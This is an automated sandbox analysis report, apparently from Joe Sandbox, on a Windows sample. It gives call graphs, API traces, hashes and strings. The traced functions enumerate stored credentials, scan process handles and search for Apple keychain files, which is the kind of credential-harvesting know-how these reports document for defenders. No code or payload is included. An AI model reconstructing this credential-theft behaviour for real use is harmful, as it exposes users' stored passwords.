38130 41f2e0 38128->38130 38129->38118 38163 41b1ca 38130->38163 38133->37896 38134->37896 38135->37896 38136->37892 38137->37893 38140 41bc54 38138->38140 38147 41be0b 38138->38147 38143 41bd61 38140->38143 38140->38147 38155 41bc8d 38140->38155 38168 41baf0 55 API calls 38140->38168 38142 41be45 38142->38111 38142->38118 38143->38142 38177 41a25f memset 38143->38177 38145 41be04 38175 41aee4 56 API calls 38145->38175 38147->38143 38176 41ae17 34 API calls 38147->38176 38148 41bd42 38148->38143 38148->38145 38149 41bdd8 memset 38148->38149 38150 41bdba 38148->38150 38151 41bde7 memcmp 38149->38151 38161 4175ed 6 API calls 38150->38161 38151->38145 38154 41bdfd 38151->38154 38152 41bd18 38152->38143 38152->38148 38173 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38152->38173 38153 41bdcc 38153->38143 38153->38151 38174 41a1b0 memset 38154->38174 38155->38143 38155->38148 38155->38152 38169 4151e3 38155->38169 38161->38153 38162->38123 38164 41b1e4 38163->38164 38166 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38164->38166 38227 41a1b0 memset 38164->38227 38166->38118 38167->38116 38168->38155 38178 41837f 38169->38178 38172 444706 11 API calls 38172->38152 38173->38148 38174->38145 38175->38147 38176->38143 38177->38142 38179 4183c1 38178->38179 38182 4183ca 38178->38182 38225 418197 25 API calls 38179->38225 38183 4151f9 38182->38183 38199 418160 38182->38199 38183->38152 38183->38172 38184 4183e5 38184->38183 38208 41739b 38184->38208 38187 418444 CreateFileW 38189 418477 38187->38189 38188 41845f CreateFileA 38188->38189 38190 4184c2 memset 38189->38190 38191 41847e GetLastError free 38189->38191 38211 418758 38190->38211 38192 4184b5 38191->38192 38193 418497 38191->38193 38226 444706 11 API calls 38192->38226 38195 41837f 49 API calls 38193->38195 38195->38183 38200 41739b GetVersionExW 38199->38200 38201 418165 38200->38201 38203 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38201->38203 38204 418178 38203->38204 38205 41817f 38204->38205 38206 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38204->38206 38205->38184 38207 418188 free 38206->38207 38207->38184 38209 4173d6 38208->38209 38210 4173ad GetVersionExW 38208->38210 38209->38187 38209->38188 38210->38209 38212 418680 43 API calls 38211->38212 38213 418782 38212->38213 38214 418160 11 API calls 38213->38214 38216 418506 free 38213->38216 38215 418799 38214->38215 38215->38216 38217 41739b GetVersionExW 38215->38217 38216->38183 38218 4187a7 38217->38218 38219 4187da 38218->38219 38220 4187ad GetDiskFreeSpaceW 38218->38220 38222 4187ec GetDiskFreeSpaceA 38219->38222 38224 4187e8 38219->38224 38223 418800 free 38220->38223 38222->38223 38223->38216 38224->38222 38225->38182 38226->38183 38227->38166 38263 424f07 38228->38263 38230 4251e4 38231 4251f7 38230->38231 38232 4251e8 38230->38232 38271 4250f8 38231->38271 38270 4446ea 11 API calls 38232->38270 38234 4251f2 38234->37927 38236 425209 38239 425249 38236->38239 38242 4250f8 127 API calls 38236->38242 38243 425287 38236->38243 38279 4384e9 135 API calls 38236->38279 38280 424f74 124 API calls 38236->38280 38237 415c7d 16 API calls 38237->38234 38239->38243 38281 424ff0 13 API calls 38239->38281 38242->38236 38243->38237 38244 425266 38244->38243 38282 415be9 memcpy 38244->38282 38246->37921 38247->37927 38248->37927 38249->37927 38250->37927 38251->37927 38252->37932 38253->37914 38255 4442eb 38254->38255 38258 444303 38254->38258 38335 41707a 11 API calls 38255->38335 38257 4442f2 38257->38258 38336 4446ea 11 API calls 38257->38336 38258->37920 38260 444300 38260->37920 38261->37930 38262->37939 38264 424f1f 38263->38264 38265 424f0c 38263->38265 38284 424eea 11 API calls 38264->38284 38283 416760 11 API calls 38265->38283 38268 424f18 38268->38230 38269 424f24 38269->38230 38270->38234 38272 425108 38271->38272 38278 42510d 38271->38278 38317 424f74 124 API calls 38272->38317 38275 42516e 38277 415c7d 16 API calls 38275->38277 38276 425115 38276->38236 38277->38276 38278->38276 38285 42569b 38278->38285 38279->38236 38280->38236 38281->38244 38282->38243 38283->38268 38284->38269 38295 4256f1 38285->38295 38313 4259c2 38285->38313 38290 4260dd 38329 424251 120 API calls 38290->38329 38294 429a4d 38297 429a66 38294->38297 38298 429a9b 38294->38298 38295->38294 38296 422aeb memset memcpy memcpy 38295->38296 38300 4260a1 38295->38300 38309 4259da 38295->38309 38311 429ac1 38295->38311 38295->38313 38316 425a38 38295->38316 38318 4227f0 memset memcpy 38295->38318 38319 422b84 15 API calls 38295->38319 38320 422b5d memset memcpy memcpy 38295->38320 38321 422640 13 API calls 38295->38321 38323 4241fc 11 API calls 38295->38323 38324 42413a 90 API calls 38295->38324 38296->38295 38330 415c56 11 API calls 38297->38330 38302 429a96 38298->38302 38332 416760 11 API calls 38298->38332 38327 415c56 11 API calls 38300->38327 38333 424251 120 API calls 38302->38333 38305 429a7a 38331 416760 11 API calls 38305->38331 38328 416760 11 API calls 38309->38328 38312 425ad6 38311->38312 38334 415c56 11 API calls 38311->38334 38312->38275 38313->38312 38322 415c56 11 API calls 38313->38322 38316->38313 38325 422640 13 API calls 38316->38325 38326 4226e0 12 API calls 38316->38326 38317->38278 38318->38295 38319->38295 38320->38295 38321->38295 38322->38309 38323->38295 38324->38295 38325->38316 38326->38316 38327->38309 38328->38290 38329->38312 38330->38305 38331->38302 38332->38302 38333->38311 38334->38309 38335->38257 38336->38260 38337->37945 40218 4147f3 40221 414561 40218->40221 40220 414813 40222 41456d 40221->40222 40223 41457f GetPrivateProfileIntW 40221->40223 40226 4143f1 memset _itow WritePrivateProfileStringW 40222->40226 40223->40220 40225 41457a 40225->40220 40226->40225 37537 4419a4 37538 44199f 37537->37538 37538->37537 37546 431671 37538->37546 37541 4418ea 37542 442bd4 37542->37541 37570 441409 memset 37542->37570 37543 4418e2 37543->37541 37569 4414a9 12 API calls 37543->37569 37547 431697 37546->37547 37548 4316d7 37546->37548 37547->37548 37549 4316ab 37547->37549 37550 4316e8 37547->37550 37579 42c02e memset 37548->37579 37549->37548 37556 4316c1 37549->37556 37557 4316df 37549->37557 37552 4316f5 37550->37552 37550->37557 37572 4169a7 11 API calls 37552->37572 37553 431903 37580 42c02e memset 37553->37580 37571 4169a7 11 API calls 37556->37571 37573 415a91 37557->37573 37558 431911 37558->37541 37558->37542 37558->37543 37562 431759 memcpy 37563 431787 37562->37563 37567 43179b 37563->37567 37577 4169a7 11 API calls 37563->37577 37564 4318a7 37578 4172c8 memset 37564->37578 37567->37564 37568 431877 memcpy 37567->37568 37568->37564 37568->37567 37569->37541 37570->37542 37571->37548 37572->37548 37574 415a9d 37573->37574 37575 415ab3 37574->37575 37576 415aa4 memset 37574->37576 37575->37548 37575->37562 37576->37575 37577->37567 37578->37548 37579->37553 37580->37558

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                              • API String ID: 708747863-3398334509
                                                                                                                                                                                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                              • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1355100292-0
                                                                                                                                                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystemmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3558857096-0
                                                                                                                                                                                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                              • API String ID: 2263259095-3798722523
                                                                                                                                                                                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                              • API String ID: 2744995895-28296030
                                                                                                                                                                                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
